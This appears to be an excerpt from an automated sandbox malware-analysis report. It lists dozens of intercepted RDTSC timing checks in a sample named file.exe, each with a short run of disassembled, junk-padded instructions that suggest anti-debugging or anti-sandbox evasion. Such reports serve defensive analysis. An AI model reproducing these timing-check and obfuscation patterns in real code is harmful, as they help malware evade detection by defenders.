                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103E821 second address: 103E837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jbe 00007F49A8F2A326h 0x0000000d popad 0x0000000e jnp 00007F49A8F2A32Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044D41 second address: 1044D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044D45 second address: 1044D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044D4F second address: 1044D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044D53 second address: 1044D6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044FF2 second address: 1045009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F49A854EE96h 0x00000011 jo 00007F49A854EE96h 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045009 second address: 104501B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 ja 00007F49A8F2A326h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104501B second address: 1045035 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F49A854EE9Eh 0x00000008 jng 00007F49A854EE96h 0x0000000e push eax 0x0000000f pop eax 0x00000010 ja 00007F49A854EE9Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10452FE second address: 1045338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e jnc 00007F49A8F2A326h 0x00000014 pop ebx 0x00000015 je 00007F49A8F2A33Dh 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045338 second address: 104533E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104533E second address: 1045343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045343 second address: 104534B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045487 second address: 104549B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F49A8F2A32Eh 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10455EB second address: 10455F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 pop edx 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10455F7 second address: 10455FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104603A second address: 104603E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049AA1 second address: 1049AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056C45 second address: 1056C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1056C49 second address: 1056C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106672D second address: 1066738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop esi 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066738 second address: 106677A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jnp 00007F49A8F2A326h 0x0000000d jmp 00007F49A8F2A338h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007F49A8F2A32Ah 0x0000001d jnc 00007F49A8F2A32Eh 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106677A second address: 1066786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F49A854EE96h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066786 second address: 106678A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D2A8 second address: 107D2AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C1C2 second address: 107C1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C1C9 second address: 107C1D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107CA4B second address: 107CA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107CA4F second address: 107CA6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F49A854EEA6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107CA6B second address: 107CA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107CA71 second address: 107CA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107CA75 second address: 107CA82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107EAD3 second address: 107EADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107EADC second address: 107EAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107EAE2 second address: 107EAE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E934 second address: 107E940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E940 second address: 107E946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E946 second address: 107E94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E94C second address: 107E958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E958 second address: 107E95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E95D second address: 107E963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E963 second address: 107E967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E967 second address: 107E96B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081529 second address: 1081535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081535 second address: 1081543 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F49A854EE96h 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081664 second address: 1081669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081669 second address: 1081682 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F49A854EE9Ch 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081682 second address: 1081688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081A58 second address: 1081AA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jns 00007F49A854EE98h 0x00000014 jmp 00007F49A854EEA6h 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c jbe 00007F49A854EEA2h 0x00000022 js 00007F49A854EE9Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10849A1 second address: 10849A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086434 second address: 1086463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F49A854EEA9h 0x0000000c jg 00007F49A854EE9Ah 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086463 second address: 108648A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F49A8F2A326h 0x0000000c popad 0x0000000d push ebx 0x0000000e jmp 00007F49A8F2A332h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108648A second address: 108648E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108648E second address: 1086492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650280 second address: 565029D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565029D second address: 56502A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56502A3 second address: 56502A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56502A7 second address: 56502E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F49A8F2A32Ch 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 mov si, di 0x0000001a movsx ebx, cx 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56502E1 second address: 56502E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56502E7 second address: 56502ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56502ED second address: 56502F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56502F1 second address: 56502F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650340 second address: 5650346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650346 second address: 565034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565034A second address: 5650378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F49A854EE9Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F49A854EEA0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650378 second address: 565037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565037C second address: 5650380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650380 second address: 5650386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650386 second address: 56503C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 pushfd 0x00000006 jmp 00007F49A854EE9Eh 0x0000000b add cl, 00000078h 0x0000000e jmp 00007F49A854EE9Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F49A854EEA5h 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99FBB second address: F99FCE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F49A8F2A328h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565043D second address: 5650442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650442 second address: 5650477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49A8F2A332h 0x00000009 sbb ecx, 4345C658h 0x0000000f jmp 00007F49A8F2A32Bh 0x00000014 popfd 0x00000015 mov ch, 5Fh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650477 second address: 565047B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565047B second address: 5650481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650481 second address: 5650487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650487 second address: 565048B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56504B8 second address: 56504EC instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 add dword ptr [esp], 33C37BADh 0x0000000f pushad 0x00000010 mov ch, bh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F49A854EE9Eh 0x0000001a xor cx, 2CA8h 0x0000001f jmp 00007F49A854EE9Bh 0x00000024 popfd 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650578 second address: 565057C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565057C second address: 5650582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650582 second address: 5650593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a inc edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650593 second address: 5650597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650597 second address: 56505A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A32Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56505A6 second address: 5650578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F49A854EE9Fh 0x00000009 or cl, 0000001Eh 0x0000000c jmp 00007F49A854EEA9h 0x00000011 popfd 0x00000012 mov bx, si 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test al, al 0x0000001a jmp 00007F49A854EE9Ah 0x0000001f jne 00007F49A854EE18h 0x00000025 mov al, byte ptr [edx] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565065F second address: 5650685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ebx, dword ptr [edi+01h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650685 second address: 5650689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650689 second address: 565068F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565068F second address: 56506C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edi+01h] 0x0000000c pushad 0x0000000d mov cx, 9F0Dh 0x00000011 mov eax, 51FA1F09h 0x00000016 popad 0x00000017 inc edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F49A854EE9Bh 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56506C1 second address: 56506C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56506C7 second address: 56506CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56506CB second address: 56506F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a jmp 00007F49A8F2A337h 0x0000000f jne 00007F4A19B026B9h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56506F8 second address: 56506FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56506FC second address: 5650717 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A337h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650717 second address: 56507FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, edx 0x0000000b jmp 00007F49A854EE9Eh 0x00000010 shr ecx, 02h 0x00000013 pushad 0x00000014 mov cl, 62h 0x00000016 mov edi, 6783BA8Eh 0x0000001b popad 0x0000001c rep movsd 0x0000001e rep movsd 0x00000020 rep movsd 0x00000022 rep movsd 0x00000024 rep movsd 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F49A854EE9Bh 0x0000002d sbb si, E33Eh 0x00000032 jmp 00007F49A854EEA9h 0x00000037 popfd 0x00000038 mov edx, ecx 0x0000003a popad 0x0000003b mov ecx, edx 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F49A854EEA8h 0x00000044 xor eax, 664A6768h 0x0000004a jmp 00007F49A854EE9Bh 0x0000004f popfd 0x00000050 pushfd 0x00000051 jmp 00007F49A854EEA8h 0x00000056 adc si, B9C8h 0x0000005b jmp 00007F49A854EE9Bh 0x00000060 popfd 0x00000061 popad 0x00000062 and ecx, 03h 0x00000065 jmp 00007F49A854EEA6h 0x0000006a rep movsb 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56507FB second address: 56507FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
